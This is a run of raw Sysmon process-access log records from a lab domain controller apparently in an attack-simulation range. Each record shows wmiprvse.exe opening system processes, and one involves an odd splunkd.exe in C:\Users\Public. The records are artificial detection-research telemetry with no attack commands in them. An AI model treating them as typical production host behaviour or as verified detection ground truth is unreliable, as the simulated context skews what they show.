15:59:44.912{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027651Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.912{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027650Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.912{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027649Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.912{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027648Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.912{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027647Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.912{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027646Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.912{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027645Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.912{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027644Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.912{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027643Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.912{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027642Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.912{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027641Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.912{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027640Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.912{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027639Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.912{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027638Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.912{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027637Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.912{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027636Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.912{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027635Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.912{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027634Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.912{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027633Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027632Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 